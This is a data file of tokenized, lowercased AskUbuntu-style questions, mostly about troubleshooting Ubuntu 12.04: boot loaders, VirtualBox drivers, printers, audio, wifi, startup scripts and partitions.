138045	ubuntu 12.04 not showing in boot selection after installing from wubi in windows 7	i know there are already several instances of this problem but i just do n't find a similar issue as mine so pardon for being redundant.i am new to ubuntu but i very much like to understand the whole thing about it . i installed ubuntu 12.04 from wubi on my existing windows 7 os . i have 2 partitions c : and d : what i did was select d : as where the ubuntu be installed and give it free space . the installation went fine then then i rebooted my machine . surprisingly it did not go to the boot selection screen , it just went straight to windows 7 . what i did is to install easybcd and found out that there is no entry for ubuntu in the bootloader only for windows 7 . i am not really quite familiar in using one of these . i can start with whatever everyone will post here for answer and i will gladly try them .
138048	`` adding esperanto circumflexes ( supersigno ) '' option has no effect	i 'm used to use the keyboard layout option to type the accentuated characters in esperanto . this option is in system settings > keyboard layout > options > adding esperanto circumflexes ( supersigno ) > to the corresponding key in a qwerty keyboard . it worked great but since i upgraded to ubuntu 12.04 , this option has no effect . i 'm using ubuntu in french with the keyboard layout french ( variant ) and gnome-shell . i tested on another computer with unity and there is the same issue . is it a known issue ? i did not find anything about itâś
138052	custom directories in nautilus ' copy to and move to menus	nautilus has a very handy copy to and move to menus . how can i add my own directories to those menus ?
138054	how do you boot up ubuntu on windows from a usb stick ?	i have windows 7 and i want to boot linux from a memory stick without installing it as i would like to run 2 oss on the same pc without losing all my files . ( does anyone know how to get into the os selection menu on a dell inspiron duo ? )
138056	microphone trouble	i am trying to use my google voice and the other party can not hear me . so i tried recoding something and it did not work . so how do i run some sort of diagnostic to check to see of my microphone is working ?
138062	keyboard shortcut to switch applications ( alt+tab ) is n't working	in ubuntu 12.04 64bit , the keyboard shortcut to switch applications ( alt+tab ) is not working i have done a full update/upgrade . keyboard layout : us format : us input source : us gui : gnome classic does any know how to fix this ?
138063	installing kde in ubuntu 12.04	is it good to use kubuntu or ubuntu with kde ? well if i install kde in ubuntu will there be any instability or conflict ? will these two get mixed up with themes and icons ? i had a bad experience with gnome shell in ubuntu 12.04.when i logged in with gnome , the gnome theme was mixed up with unity , the same happened with unity , so i had to uninstall gnome . is there any way to make ubuntu look exactly like kubuntu ( same ui , menus and theme ) , the kde apps does not matter to me . ( i do n't wan na download kubuntu ) . i want to keep both unity and kde .
138066	grub loader not appearing on boot when dual booting with windows 7	i 've just dual booted windows 7 and ubuntu , but whenever i boot my computer the grub loader asking me which os i want to boot into does n't appear and i get launched straight into windows . i installed windows first , and they 're on the same hdd , on consecutive partitions . any help appreciated , matt
138068	no cuda in ubuntu 12.04 ?	is there no solution for cuda for ubuntu 12.04 ? blender uses it under windows , but ubuntu ca n't handle it .
138074	how to get ubuntu on bootloader	i have install c drive window 7 and e driver ubuntu . it works fine , when first time rum my computer it comes boot loader ( choosing option ) which os do you want run . but some problem in my window 7 , after that problem , i format window 7 but boot loader does n't comes . so , how to get ubuntu in boot loader .
138077	how to enlarge encrypted swap partition ?	i have added some ram to my netbook . i 'd like to save an option to hibernate my computer , so i have to increase my swap from 2gib to 4gib . my /etc/fstab looks like this : uuid=57b6e4ca-86f6-440d-8d45-2295a86a946b / ext4 errors=remount-ro 0 1 /dev/mapper/sda6_crypt /home ext4 defaults 0 2 /dev/mapper/sda5_crypt none swap sw 0 0 my /etc/crypttab looks like this : sda5_crypt uuid=17ec5831-e49e-4eb0-aa63-05101038a85c none luks , swap sda6_crypt uuid=2a01b2a0-e954-4a97-9202-6cdbc0152e73 none luks appreciate any help .
138079	can not load vboxdrv module in 12.04 and 3.2.0-23-realtime	i 'm trying to start virtualbox without success , please give some advice on how to fix it : the gui opens up successfully and i can add existing images but when i try to start a virtual machine , i get the message : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . i have installed virtualbox-dkms , the version from apt-get and from the oracle website , i 've tried to run /etc/init.d/vboxdrv setup , /etc/init.d/virtualbox/start , modprobe vboxdrv but my system always complaints about not being able to load the kernel module : fatal : error inserting vboxdrv ( /lib/modules/3.2.0-23-realtime/updates/dkms/vboxdrv.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) here 's the output of sudo dpkg-reconfigure virtualbox-dkms : -- -- -- -- uninstall beginning -- -- -- -- module : virtualbox version : 4.1.12 kernel : 3.2.0-23-realtime ( x86_64 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - status : before uninstall , this module version was active on this kernel . vboxdrv.ko : - uninstallation - deleting from : /lib/modules/3.2.0-23-realtime/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . vboxnetadp.ko : - uninstallation - deleting from : /lib/modules/3.2.0-23-realtime/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . vboxnetflt.ko : - uninstallation - deleting from : /lib/modules/3.2.0-23-realtime/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . vboxpci.ko : - uninstallation - deleting from : /lib/modules/3.2.0-23-realtime/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... . dkms : uninstall completed . -- -- -- -- uninstall beginning -- -- -- -- module : virtualbox version : 4.1.12 kernel : 3.2.0-24-generic ( x86_64 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - status : before uninstall , this module version was active on this kernel . vboxdrv.ko : - uninstallation - deleting from : /lib/modules/3.2.0-24-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . vboxnetadp.ko : - uninstallation - deleting from : /lib/modules/3.2.0-24-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . vboxnetflt.ko : - uninstallation - deleting from : /lib/modules/3.2.0-24-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . vboxpci.ko : - uninstallation - deleting from : /lib/modules/3.2.0-24-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... . dkms : uninstall completed . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 4.1.12 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new virtualbox-4.1.12 dkms files ... building for 3.2.0-23-realtime and 3.2.0-24-generic building initial module for 3.2.0-23-realtime ^ [ [ a^ [ [ adone . vboxdrv : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-23-realtime/updates/dkms/ vboxnetadp.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-23-realtime/updates/dkms/ vboxnetflt.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-23-realtime/updates/dkms/ vboxpci.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-23-realtime/updates/dkms/ depmod ... . dkms : install completed . building initial module for 3.2.0-24-generic done . vboxdrv : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-24-generic/updates/dkms/ vboxnetadp.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-24-generic/updates/dkms/ vboxnetflt.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-24-generic/updates/dkms/ vboxpci.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-24-generic/updates/dkms/ depmod ... . dkms : install completed . * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * modprobe vboxdrv failed . please use 'dmesg ' to find out why and also the output of dmesg after i try sudo modbrobe vboxdrv : [ 1764.425935 ] vboxdrv : unknown symbol down_write ( err 0 ) [ 1764.425968 ] vboxdrv : unknown symbol up_write ( err 0 ) [ 1764.426096 ] vboxdrv : unknown symbol down_read ( err 0 ) [ 1764.426169 ] vboxdrv : unknown symbol up_read ( err 0 ) [ 1774.383081 ] vboxdrv : unknown symbol down_write ( err 0 ) [ 1774.383096 ] vboxdrv : unknown symbol up_write ( err 0 ) [ 1774.383131 ] vboxdrv : unknown symbol down_read ( err 0 ) [ 1774.383157 ] vboxdrv : unknown symbol up_read ( err 0 ) [ 1913.247363 ] vboxdrv : unknown symbol down_write ( err 0 ) [ 1913.247430 ] vboxdrv : unknown symbol up_write ( err 0 ) [ 1913.247526 ] vboxdrv : unknown symbol down_read ( err 0 ) [ 1913.247594 ] vboxdrv : unknown symbol up_read ( err 0 ) [ 2121.744210 ] applesmc : fs ! : read arg fail [ 2234.558172 ] vboxdrv : unknown symbol down_write ( err 0 ) [ 2234.558183 ] vboxdrv : unknown symbol up_write ( err 0 ) [ 2234.558207 ] vboxdrv : unknown symbol down_read ( err 0 ) [ 2234.558227 ] vboxdrv : unknown symbol up_read ( err 0 ) [ 2600.875176 ] vboxdrv : unknown symbol down_write ( err 0 ) [ 2600.875208 ] vboxdrv : unknown symbol up_write ( err 0 ) [ 2600.875303 ] vboxdrv : unknown symbol down_read ( err 0 ) [ 2600.875373 ] vboxdrv : unknown symbol up_read ( err 0 ) i did install the kernel headers : sudo apt-get install linux-headers- $ ( uname -r )
138085	after upgrade to 12.04 , display garbled after log in	it is fine before i could log in , but it becomes garbled once logged in either as user , or as guest . how can this problem be solved ? if not , how can i go back to my previous installation. ? thanks .
138088	standby/suspend to ram does not work - asus eeepc wakes up immediately	i 'm using 12.04 on a asus 1201 eeepc . hibernation works well after re-enabling ( thanks for that post ! ) , but the suspend mode does not persist . after switching the netbook off it is awaking immediately - at least without any problems . a real working standby/suspend to ram would shure be better than a ( slower ) wakeup from hibernation . any hints to solve this ? edit : the eeepc does not support usb 3.0 , and switching from propriatary nvidia to standard video drivers did n't work either .
138089	where is tor browser opening transmission from ? how can i open the `` same '' transmission ?	when i launch tor-browser , it first launches vidalia , then a special version of firefox bundled with the tor browser package . if i try to download a ( legal ! ) torrent in the tor browser version of firefox , it launches transmission to do so . if i launch transmission from within the tor browser , it will remember my current torrents . this persists from one tor browser session to the next , including logouts , shutdowns , etc . if , however , i try to launch transmission from its location ( usr/bin/transmission-gtk ) , it starts transmission `` fresh '' without remembering any torrents or other settings . i assume transmission is somehow loading another version of itself for firefox -- the one that remembers things -- that is n't somewhere i can find it . only one transmission-gtk executable appears when i search my file system ... the one in usr/bin . what 's going on ? how can i open transmission and have it `` remember '' things without having to start a torrent on tor-browser first ?
138098	how to make my screen brightness not change when i plug my laptop in	i do not want my laptop to change brightness when my laptop power is plugged in or unplugged . i set my brightness based on how bright my surroundings are . if i am in a dark room , i set my brightness very low and when i plug my laptop in the brightness gets set to maximum which feels like sticking my eyes in boiling lava . in system settings â¸ brightness and lock the dim screen to save power checkbox is unchecked . my laptop is an hp mini 110 in case it is an acpi issue i have put my acpi-support file here http : //paste.ubuntu.com/1008244/
138106	sounds comes out of both headset and speakers	ubuntu 12.04 is great except sound problems . this issue is common , sound comes out the headset and speakers at the same time , i have tried to find a solution through forums , internet ... ... .but not yet able to fix that ! it 's so annoying and it 's the only reason keeping me from using 12.04 . any fix soon ?
138119	ipconfig not working	for some reason when i enter ipconfig in terminal , it just returns this : '' '' no command 'ipconfig ' found , did you mean : command 'tpconfig ' from package 'tpconfig ' ( universe ) command 'iwconfig ' from package 'wireless-tools ' ( main ) command 'ifconfig ' from package 'net-tools ' ( main ) ipconfig : command not found '' '' not quite sure what the issue is here or how to approach this
138125	vpn has not worked since upgrading to 12.04	i am trying to establish a vpn connection on 12.04 . it had worked in 11.10 but not at all right now . i can connect with windows 7 . my roommate also recently upgraded and is having the same problem . here is an excerpt from my system log : http : //paste.ubuntu.com/991558/ we would appreciate any help ! update : i have tried recreating the connection and allowing mppe encryption . my roommate found that he is able to get a vpn connection at another location . is it possible that this has something to do with the way ubuntu is communicating with this specific ( and , i forgot to mention , new buffalo ) router , while windows has no issues at all ?
138130	unity calendar lens not showing events	i 'm trying to get proper/useful calendar integration into ubuntu 12.04 . i have a google calendar ( & account ) and i want to be able to use this without opening the browser . i want to get the unity calendar lens working , so that it shows events coming up , and it allows me a quick way to add new events . however , after installing it , it does not find any events , nor allow me to add a new event . note that i 've installed lightning 1.4 , evolution mirror 0.2.3 , evolution , and unity-calendar lens . i 've also installed calendar-indicator . i suspect that somehow the lens is not getting the calendar information from thunderbird via evolution . a bit of searching around led me to try this command : /usr/lib/calendar-lens/calendar-lens-daemon.py . with this result : /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject traceback ( most recent call last ) : file `` /usr/lib/calendar-lens/calendar-lens-daemon.py '' , line 324 , in daemon = daemon ( ) file `` /usr/lib/calendar-lens/calendar-lens-daemon.py '' , line 80 , in init for calendar in evolution.ecal.list_calendars ( ) : attributeerror : 'nonetype ' object has no attribute 'list_calendars' any ideas ?
138133	how to troubleshot a printer failure ?	after a fresh ubuntu 12.04 install , the samsung laser monochromatic printer ( ml-1860 ) fails to print intermittently : sometimes it prints and sometimes it says that it is printed but it is actually not . if i ask to print 6 copies , it prints around 2 copies ( if so ) . if i unplug the usb and replug it prints at least the first job sent . the same if i turn it off and on . but if i run sudo service cups stop & & sleep 1 & & sudo service cups start the problem persists . i do n't know if it is related to the bug # 973270 because my print is connected at usb not at ipp . looks like bas-roufs has had the same problem after he fixed his installation problem as he said in a deleted answer . the content of /var/log/cups/error.log is : w [ 16/may/2012:20:49:53 -0300 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'samsung-ml-1860-series-gray.. ' already exists w [ 16/may/2012:20:49:53 -0300 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-samsung-ml-1860-series ' already exists w [ 16/may/2012:20:49:53 -0300 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'samsung-ml-1860-series-gray.. ' already exists w [ 16/may/2012:20:49:53 -0300 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-samsung-ml-1860-series ' already exists w [ 16/may/2012:20:49:53 -0300 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'samsung-ml-1860-series-gray.. ' already exists w [ 16/may/2012:20:49:53 -0300 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-samsung-ml-1860-series ' already exists i have followed the wiki debuggingprintingproblems and made a bug report ( # 1003422 ) . the result of tail -f /var/log/syslog is : may 23 10:00:26 desguai3 udev-configure-printer : uri contains usb serial number may 23 10:00:26 desguai3 udev-configure-printer : uri match : usb : //samsung/ml-1860 % 20series ? serial=z5m7bdab501185x . may 23 10:00:26 desguai3 udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1 may 23 10:00:26 desguai3 udev-configure-printer : device already handled may 23 10:00:26 desguai3 udev-configure-printer : consider also queues with `` /usb/lp0 '' or `` /usblp0 '' in their uris as matching may 23 10:00:26 desguai3 udev-configure-printer : uri of print queue : mfp : /dev/mfp4 , normalized : mfp dev mfp4 may 23 10:00:26 desguai3 udev-configure-printer : uri of detected printer : usb : //samsung/ml-1860 % 20series ? serial=z5m7bdab501185x. , normalized : samsung ml 1860 series serial z5m7bdab501185x may 23 10:00:26 desguai3 udev-configure-printer : uri of print queue : usb : //samsung/ml-1860 % 20series ? serial=z5m7bdab501185x. , normalized : samsung ml 1860 series serial z5m7bdab501185x may 23 10:00:26 desguai3 udev-configure-printer : uri of detected printer : usb : //samsung/ml-1860 % 20series ? serial=z5m7bdab501185x. , normalized : samsung ml 1860 series serial z5m7bdab501185x may 23 10:00:26 desguai3 udev-configure-printer : queue ipp : //localhost:631/printers/ml-1860-series has matching device uri may 23 10:00:26 desguai3 udev-configure-printer : re-enabled printer ipp : //localhost:631/printers/ml-1860-series at ubuntu forum there is a thread about it too . so how can i troubleshot this failure ? where else to look for information or possibles fixes ?
138134	what startup system does ubuntu use ?	i 've seen several ways to add programs or daemons to startup in ubuntu 12.04 but i am kind of perturbed with the meaning of each method , basically because i dont understand the underlying startup procedure . anyway , the point of that i am needing is a way to run a daemon before login with root as owner a way to run a program after the login of one user a way to run a program after the login of any user a way to run a program when all gnome environment is setted up thanks ; )
138140	how do i install qemu ?	how do i install the qemu command ? i type qemu and press tab and i get a list of several binaries installed . qemu-alpha qemu-arm ... qemu-x86_64 but no qemu . i type man qemu and it returns the docs as if the command is already instaled . i type qemu to run the command but it does n't exist ? no command 'qemu ' found , did you mean : command 'qtemu ' from package 'qtemu ' ( universe ) command 'aqemu ' from package 'aqemu ' ( universe ) qemu : command not found but after installing sudo apt-get install qtemu aqemu i still unable to run qemu . i 'm just attempting to run the following command qemu -localtime -net user -net nic -m 256 -cdrom minix.iso -hda minix.img -boot d , for a minix tutorial . any help would be appreciated .
138142	how can i activate coverflow in nautilus ?	i am using ubuntu 12.04 and would like to know how to activate coverflow in nautilus . i read about nautilus-elementary but can not find that package for 12.04 .
138148	need help with griffin powermate usb volume controller - new 64 bit desktop & ubuntu 12.04	i 'd appreciate some help with running a griffin powermate usb volume controller on my new 64 bit 12.04 desktop - to control / mute the machine 's master volume , & scroll through cbr files . according to google & sourceforge , something called gizmo daemon / gizmod was the way to go until a while ago , but i 've only found one site on it that 's recent - and the method proposed is a bit too much of a leap for me at this point ... . i am very new to ubuntu so ideally i 'd really appreciate some clear instructions - and a ready-to-rock package if there 's one out there . cheers , dave - an aussie in glasgow , scotland . http : //sourceforge.net/apps/mediawiki/gizmod/index.php http : //epiguru.com/2011/11/how-to-use-griffin-powermate-with-gizmo-daemon-on-linux/
138152	software to copy a scratched cd/dvd/blueray to an iso file	i have some optical discs that are sorely scratched . i 've cleaned the discs , but they still have trouble reading . when trying ddrescue to backup the discs , it will read up to x bytes , and fail on all bytes after that ( because the drive needs to be ejected before it can resume from the read failure ) . is there any good software specifically for the purpose of copying scratched optical discs to an image file ?
138153	update to 12.04 failed , now unusable system	during the installation it mention something about sandbox or something like that . but it continued normally . the installation was interrupted twice by a message that said only 500mb are free , delete some applications , etc . i pressed the option that would have allowed me to do that but never actually opened until the end of the installation were a message announce a mistake that made impossible to finish the process , said the system might be unusable and that a recovery stuff would start but that never happened . i can open some programs like this one and libre office but can not start the software center and the update manager . i 've considered downloading the os from internet to a cd and reinstall but i know i 'll lose all my applications , and documents , i made a backup before so my files are safe but i do n't want to install all my apps again . is there any other way ? thanks for any help or advice you can give me .
138154	keep getting this message on start up `` an error occured while mounting ext3 ''	i was following this link to install oracle 11gr2 on ubuntu 11.10 as mentioned in the above link # 6 resize the root partition , i created a new partition for free space of 18gb with ext3 type of partition . and the link says follow the below steps after partitioning : cp /etc/fstab /etc/fstab_`date + % n` uuid=`blkid | grep oraclexe | awk ' { print $ 3 } '` uuid=`echo $ uuid | tr -d '\042'` echo $ uuid echo `` $ uuid /u01 ext3 errors=remount-ro 0 1 '' > > /etc/fstab but here is where i got confused on what exactly he is asking me to do..so i just ran these commands in the command line..each command one by one.. and when i restart i see the messages : an error occured while mounting ext3 press s to skip mounting or m for manual recovery tutorial also says like i have to configure uuid and all that but the steps are not clear on how to do that ? and this is how my fstab looks like link please help me on how to resolve this issue.. thanks in advance
138159	why does my dell 1130n printer not install ?	i have a fully updated ubuntu 12.04 and my dell laser class 1130n printer wo n't install via a usb port . does anyone have any ideas ? it says that i have the wrong driver and it only prints an error page .
138163	how do i know which partitions belong to linux , and which belongs to windows ?	okay , so i want to re-install ubuntu , but in order to do so i 'm being told to delete my previous linux partitions . however , i ca n't tell which one 's to delete . the only one i know for sure is the linux swap , because it has linux in its name . how do i know which other partitions i can delete , without screwing up windows 7 ? https : //sites.google.com/site/easylinuxtipsproject/reinstallation
138171	problems with internet connectivity with belkin n150 wireless router on ubuntu 12.04	this question might not be directly related to problems in ubuntu , but i am still posting this here because it is possible that someone might know of a solution . i am using ubuntu 12.04 and am using a belkin n150 wireless router to connect to the internet . it seems that there is a problem with using belkin n150 wireless routers . the internet connection is very flaky , and the connection drops frequently for a few minutes before it is again re-established . i found the following link that discusses how to solve this problem on other non-linux platforms . http : //www.wurwaldesign.com/blog/2011/03/belkin-n150-router-slow-solutions-for-complete-beginners/ it would help if anyone can suggest ways to solve this issue on ubuntu .
138173	wifi looses connection with ar9285 - have to disconnect / connect to regain internet ?	i have a g73jw laptop using ubuntu 12.04 . it has an atheros ar9285 card . while wifi seems to work fine most of the time , about every hour or two it will loose the connection to the internet . the connection will appear to be connected still to the wireless router , but internet access is gone . disconnecting and reconnecting to the access point solves the problem , as does disabling and reenabling the adapter via the hardware keyboard shortcut . how might this be solved so the connection is stable and does n't drop ? edit : it looks like the network dropping is n't related to dns as it fails either way : codyloco @ codyloco-ubuntu : ~ $ dig askubuntu.com @ 8.8.8.8 ; < < > > dig 9.8.1-p1 < < > > askubuntu.com @ 8.8.8.8 ; ; global options : +cmd ; ; connection timed out ; no servers could be reached codyloco @ codyloco-ubuntu : ~ $ dig askubuntu.com ; < < > > dig 9.8.1-p1 < < > > askubuntu.com ; ; global options : +cmd ; ; connection timed out ; no servers could be reached again cycling ( disabling / enabling ) the adapter corrects the issue .
138177	upgraded to 12.04 now no audio over amd hdmi	i 've looked this issue up a bunch , but most of the solutions are unity solutions . i am using xfce and ca n't seem to find the new ubuntu settings control panel . i am using mythbuntu , and i upgraded from 11.10 to 12.04 . now i am not getting audio over hdmi . i 'm sure it 's a simple problem , but all the solutions i 've looked up have not resolved it .
138178	is there a tool that lets you navigate to frequently used directories more easily ?	instead of using cd , pushd , popd , and cdable_vars , and cdpath , i heard a while ago that there was a tool that `` learned '' the paths you most frequently navigated to and make shortcuts for those dynamically . does anyone know what tool i vaguely have in mind ?
138179	is there a way to set build preference on launchpad ?	say , for example , i am solving a problem for someone . i know they are on x64 . is there a way to set the build preference to x64 before x86 ?
138180	can i use an alternative to upstart ?	hi can i use the old style init scripts under ub 12.04 ? im fed up with my upstart scripts working intermittently . i have a process which relies on cifs mounts ( defined in fstab ) . i 've tried all the usual 'wait for the interface ' and 'wait for the local filesystem ' dependencies in my upstart but nothing seems to work . my command works fine on the cmd line . i think what 's happening is that cifs has n't mounted at the time the upstart script tries to run . upstart just seems broken to me . start on ( local-filesystems and net-device-up iface=eth0 and mounted mountpoint=/storage/server ) stop on shutdown expect daemon script cd /storage/server/scripts/myprog su -c `` /home/gurpal2000/ruby-1.9.3-p0/bin/bundle exec /home/gurpal2000/ruby-1.9.3-p0/bin/ruby lib/main.rb > /storage/server/logs/myprog.txt 2 > & 1 '' gurpal2000 end script thanks
138183	how to resize all row of a column ?	suppose you are researching on a topic and have found something with a tabular form , now you would like to save that in your spreadsheet application to see that when offline , so you fired up openoffice calc or ms excel and pasted that table . now i do n't know about ms excel , but when i pasted in libreoffice calc then i seen something like as shown in the screenshot . as you can see the width of column a b and c can be resized because they are only 3 in numbers , but its hard to edit the height of 1 , 2 , 3 , 4 etc . question any other way to resize the heights of 1 , 2 , 3 , 4 than doing manually ?
138187	update manager `` failed to download repository information '' error	whenever i try to install updates i get this : this is what it says under details : w : failed to fetch `` http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/oneiric/main/source/sources '' 404 not found w : failed to fetch `` http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch '' http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/oneiric/main/binary-i386/packages '' 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i 'm using 11.10 with gnome 3 .
138190	nautilus crashes after installing 'nautilus columns '	i just installed nautilus columns ( nautilus extension ) in ubuntu 12.04 64bit and after installing it i ca n't open nautilus it just crashes/closes when i try opening it . this is the message i get from the command line when i run nautilus : initializing nautilus-ideviceinfo extension /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject traceback ( most recent call last ) : file `` /usr/share/nautilus-python/extensions/arista-nautilus.py '' , line 38 , in import nautilus importerror : no module named nautilus initializing nautilus-dropbox 0.7.1 typeerror : metaclass conflict : the metaclass of a derived class must be a ( non-strict ) subclass of the metaclasses of all its bases segmentation fault ( core dumped ) does anyone have any ideas because i would like to get this working .
138194	ca n't configure 5.1 audio with 12.04	i have an intel alc892 and a nvidia gt 520m connected to speakers via hdmi . on lspci , i see 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) subsystem : zotac international ( mco ) ltd. device a218 flags : bus master , fast devsel , latency 0 , irq 47 memory at db400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel 02:00.1 audio device : nvidia corporation hdmi audio stub ( rev a1 ) subsystem : zotac international ( mco ) ltd. device 2180 flags : bus master , fast devsel , latency 0 , irq 18 memory at db080000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 kernel driver in use : snd_hda_intel my alsamixer looks like i enabled pulseaudio configuration file to have 6 channels . my sound setting looks like when i use the test dialog , only front left and right have sounds . if i use alsa in xbmc on a 5.1 video , there 's no sound . if i use pulseaudio , only front right and left have sound . i can barely hear any speech since i 'm guessing it 's mapped to front center . any clues ? update : on what i 'm hearing on ubuntu 's irc , i ca n't do 5.1 over hdmi and my best bet is to encode ac3 live over s/pdif using a52 but i ca n't compile alsa-plugins ... it gives an error somewhere while building oss . any second opinions ?
138196	how can i restore network indicator in unity panel ?	i just cleaned up junk files on my ubuntu 12.04 . after that , i restarted my ubuntu . but then , i lose the network indicator in the unity panel . i do n't know how to restore the network icon as before .
138204	why has my alt + tab animation changed ?	i 'm new to ubuntu and recently installed it a coupled days ago . when i alt+tab , the animation is in a white rectangle with simple icons . i also have this problem with workplace switching . how can i get it back to the previous settings where when switching between workplaces was animated and took you through them and alt+tab had the bigger icons ? this is what is was and want it back to : and this is what i see :
138217	lenovo mute led button not working	the led light that turns on when i press the mute button on or off , respectively , does not turn on in ubuntu , yet turns on in xubuntu . if anyone has any knowledge or help please lem me know ! btw , this is a lenovo w520 laptop ! edit : the light does n't turn on , it 's strictly a cosmetic effect , but a nice one !
138225	problem while updating : (	i am using ubuntu 12.04 lts . and i recently installed open jdk from the software center and also the iced tea plugin . from that time , whenever i install any updates or packages , this error pops up . please help !
138227	how to migrate ubuntu 12.04 installation to another partition in simple way ?	i 've installed 12.04 to run alongside my windows7 but in the process a couple of things happened . my install went wrong and i wound up with an extra partition . it was compromised so i 've wiped it and formatted ext4 to match my current 12.04 install my working 12.04 partition is in a very large partition that i want to use as a media partition to be accessed by either os . i want to migrate the contents of my current partition to the newly formatted ext4 partition , reformat the bigger partition to ntfs ( i am a big fan of the 'search everything ' application on win7 ) and somehow set ubuntu to mount my soon-to-be-new media partition on startup . i notice a 'linux swap ' partition . i have no idea what that is and i presume it 's for the system to constantly be reorganizing itself and probably have to deal with that as well as getting the bootloader to recognize the migrated partition i will admit that i have no idea how to decipher code for the terminal and prefer for a program/application to be working the code through the system for me . that being said , dragging and dropping lines of code into the terminal is n't beyond me . what 's the simplest , most straight forward way to do this ? edit to add : my apologies for an otherwise bloated entry ... it was suggested to me to provide system details and i have . if there 's a better way to do this please advise . .r . mounted file systems /dev/sda7 / 12.95 % ( 260.8 gib of 299.6 gib ) udev /dev 0.00 % ( 2.9 gib of 2.9 gib ) tmpfs /run 0.07 % ( 1.2 gib of 1.2 gib ) none /run/lock 0.00 % ( 5.0 mib of 5.0 mib ) none /run/shm 0.11 % ( 2.9 gib of 2.9 gib ) computer summary computer processor 4x intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz memory 6060mb ( 1599mb used ) operating system ubuntu 12.04 lts user name newboldrob ( rob newbold ) date/time thu 17 may 2012 02:51:12 pm edt display resolution 1366x768 pixels opengl renderer unknown x11 vendor the x.org foundation multimedia audio adapter hda-intel - hda intel pch input devices power button lid switch power button at translated set 2 keyboard toshiba input device cnf9055 video bus synps/2 synaptics touchpad hda intel pch hdmi/dp , pcm 3= printers no printers found scsi disks ata seagate st950056 matshita dvd-ram uj8a0as generic- xd/sd/m.s . operating system version kernel linux 3.2.0-24-generic ( x86_64 ) compiled # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 c library unknown default c compiler gnu c compiler version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) distribution ubuntu 12.04 lts current session computer name satellite-e305 user name newboldrob ( rob newbold ) home directory /home/newboldrob desktop environment unity ( ubuntu ) misc uptime 19 minutes load average 1.04 , 0.89 , 0.61 kernel modules loaded modules snd_hda_codec_hdmi hdmi hd-audio codec joydev joystick device interfaces rfcomm bluetooth rfcomm ver 1.11 bnep bluetooth bnep ver 1.3 bluetooth bluetooth core ver 2.16 parport_pc pc-style parallel port driver ppdev snd_hda_intel intel hda driver snd_hda_codec hda codec core snd_hwdep hardware dependent layer snd_pcm midlevel pcm code for alsa . arc4 arc4 cipher algorithm snd_seq_midi advanced linux sound architecture sequencer midi synth . snd_rawmidi midlevel rawmidi code for alsa . snd_seq_midi_event midi byte < - > sequencer event coder snd_seq advanced linux sound architecture sequencer . snd_timer alsa timer interface snd_seq_device alsa sequencer device management psmouse ps/2 mouse driver rts_pstor realtek pci-express card reader driver iwlwifi intel ( r ) wireless wifi link agn driver for linux serio_raw raw serio driver mac80211 ieee 802.11 subsystem uvcvideo usb video class driver videodev device registrar for video4linux 